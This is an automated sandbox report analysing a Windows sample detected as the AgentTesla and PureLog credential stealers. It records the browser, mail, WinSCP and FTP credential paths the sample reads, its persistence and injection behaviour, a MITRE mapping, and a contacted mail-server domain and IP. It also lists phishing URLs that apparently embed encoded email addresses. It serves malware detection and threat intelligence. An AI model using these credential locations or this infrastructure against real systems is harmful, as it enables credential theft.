Source: C:\Users\user\AppData\Roaming\SVcPIbJno.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation

Source: C:\Users\user\Desktop\Shipping Docs.rdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 10.2.SVcPIbJno.exe.3cb8150.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.42768e0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SVcPIbJno.exe.3c7d130.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SVcPIbJno.exe.3cb8150.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SVcPIbJno.exe.3c7d130.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.42768e0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2448473771.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2448473771.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1245608119.0000000002F12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1241904701.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1229585940.000000000423B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1282453180.0000000003C7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1245608119.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2448473771.000000000306C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipping Docs.rdf.exe PID: 1664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SVcPIbJno.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7636, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.5a00000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.5a00000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.2fac5ec.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.332b878.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.332a860.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.32f0450.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.2fac5ec.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1231304575.0000000005A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1227838638.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1227838638.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 10.2.SVcPIbJno.exe.3cb8150.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.42768e0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SVcPIbJno.exe.3c7d130.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SVcPIbJno.exe.3cb8150.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SVcPIbJno.exe.3c7d130.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.42768e0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1241904701.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1229585940.000000000423B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1282453180.0000000003C7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1245608119.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2448473771.000000000306C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipping Docs.rdf.exe PID: 1664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SVcPIbJno.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7636, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 10.2.SVcPIbJno.exe.3cb8150.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.42768e0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SVcPIbJno.exe.3c7d130.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SVcPIbJno.exe.3cb8150.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SVcPIbJno.exe.3c7d130.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.42768e0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.423b8c0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2448473771.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2448473771.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1245608119.0000000002F12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1241904701.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1229585940.000000000423B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1282453180.0000000003C7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1245608119.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2448473771.000000000306C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipping Docs.rdf.exe PID: 1664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SVcPIbJno.exe PID: 7428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7636, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.5a00000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.5a00000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.2fac5ec.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.332b878.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.332a860.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.32f0450.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipping Docs.rdf.exe.2fac5ec.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1231304575.0000000005A00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1227838638.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1227838638.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	2 Obfuscated Files or Information	1 Credentials in Registry	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	22 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	151 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Shipping Docs.rdf.exe	44%	Virustotal		Browse
Shipping Docs.rdf.exe	32%	ReversingLabs	Win32.Trojan.Generic
Shipping Docs.rdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\SVcPIbJno.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\SVcPIbJno.exe	32%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Roaming\SVcPIbJno.exe	44%	Virustotal		Browse
C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	0%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mail.parsdarou.ir	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
http://mail.parsdarou.ir	0%	Avira URL Cloud	safe
http://r3.i.lencr.org/0g	0%	Avira URL Cloud	safe
http://mail.parsdarou.ir	1%	Virustotal		Browse
http://r3.i.lencr.org/0g	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.parsdarou.ir	5.144.130.49	true	true	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://r3.o.lencr.org0	RegSvcs.exe, 0000000E.00000002.2448473771.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2455852920.0000000006330000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000008.00000003.1207491337.000001E66AF20000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	false		high
http://crl.ver)	svchost.exe, 00000008.00000002.2450570227.000001E66B000000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://g.live.com/odclientsettings/Prod1C:	edb.log.8.dr	false		high
https://account.dyn.com/	Shipping Docs.rdf.exe, 00000000.00000002.1229585940.000000000423B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1241904701.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SVcPIbJno.exe, 0000000A.00000002.1282453180.0000000003C7D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r3.i.lencr.org/0g	RegSvcs.exe, 0000000E.00000002.2448473771.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2455852920.0000000006330000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Shipping Docs.rdf.exe, 00000000.00000002.1227838638.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, SVcPIbJno.exe, 0000000A.00000002.1268003499.00000000029FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.t.co	RegSvcs.exe, 0000000E.00000002.2455852920.000000000637A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	Shipping Docs.rdf.exe, SVcPIbJno.exe.0.dr	false	URL Reputation: safe	unknown
http://x1.c.lencr.org/0	RegSvcs.exe, 0000000E.00000002.2448473771.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2455852920.0000000006330000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://x1.i.lencr.org/0	RegSvcs.exe, 0000000E.00000002.2448473771.00000000030DA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2455852920.0000000006330000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mail.parsdarou.ir	RegSvcs.exe, 00000009.00000002.1245608119.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.2448473771.00000000030DA000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
5.144.130.49	mail.parsdarou.ir	Iran (ISLAMIC Republic Of)		59441	HOSTIRAN-NETWORKIR	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1437208
Start date and time:	2024-05-07 07:19:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Shipping Docs.rdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@24/23@1/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 124 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.51.58.94
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target boqXv.exe, PID 3216 because it is empty
Execution Graph export aborted for target boqXv.exe, PID 7584 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:19:53	API Interceptor	2x Sleep call for process: Shipping Docs.rdf.exe modified
07:19:55	Task Scheduler	Run new task: SVcPIbJno path: C:\Users\user\AppData\Roaming\SVcPIbJno.exe
07:19:55	API Interceptor	2x Sleep call for process: svchost.exe modified
07:19:55	API Interceptor	29x Sleep call for process: powershell.exe modified
07:19:56	API Interceptor	48x Sleep call for process: RegSvcs.exe modified
07:19:57	API Interceptor	2x Sleep call for process: SVcPIbJno.exe modified
07:19:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
07:20:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run boqXv C:\Users\user\AppData\Roaming\boqXv\boqXv.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
5.144.130.49	PAYMENT LIST.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	PO# CV-PO23002552.PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	https://wro16kdfl.lavinphysio.com/?qp=c2FuYWJyaWF0QGhpbGxzYm9yb3VnaGNvdW50eS5vcmc=	Get hash	malicious	Unknown	Browse
	http://www.checkpointmarketing.net/newsletter/linkShim.cfm?key=362983194G2589J6588285N9N118124&link=https://aqvpaxxbr.lavinphysio.com/?qp=dGFtaUBnaGVlbmlycmlnYXRpb24uY29t	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.parsdarou.ir	PAYMENT LIST.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.144.130.49
mail.parsdarou.ir	PO# CV-PO23002552.PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.144.130.49

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HOSTIRAN-NETWORKIR	PAYMENT LIST.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.144.130.49
	PO# CV-PO23002552.PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.144.130.49
	PO# CV-PO23002552.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.144.130.35
	Overdue Account.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	5.144.130.35
	https://hamrahansystem.com/4xe3cx/?PliaTEYmfRsh	Get hash	malicious	Unknown	Browse	45.138.134.33
	Saham_Man.apk	Get hash	malicious	IRATA	Browse	5.144.130.58
	Invoice-AWB-Document.doc.exe	Get hash	malicious	AgentTesla	Browse	5.144.130.32
	https://wro16kdfl.lavinphysio.com/?qp=c2FuYWJyaWF0QGhpbGxzYm9yb3VnaGNvdW50eS5vcmc=	Get hash	malicious	Unknown	Browse	5.144.130.49
	http://www.checkpointmarketing.net/newsletter/linkShim.cfm?key=362983194G2589J6588285N9N118124&link=https://aqvpaxxbr.lavinphysio.com/?qp=dGFtaUBnaGVlbmlycmlnYXRpb24uY29t	Get hash	malicious	HTMLPhisher	Browse	5.144.130.49
	TT_0034578218845301 Advice.xlsx	Get hash	malicious	FormBook	Browse	185.173.105.99

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\boqXv\boqXv.exe	MAR-2024 SOA.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	New Point of Contact for Corporate Courier Account - DHL.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	MAR-2024 SOA.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
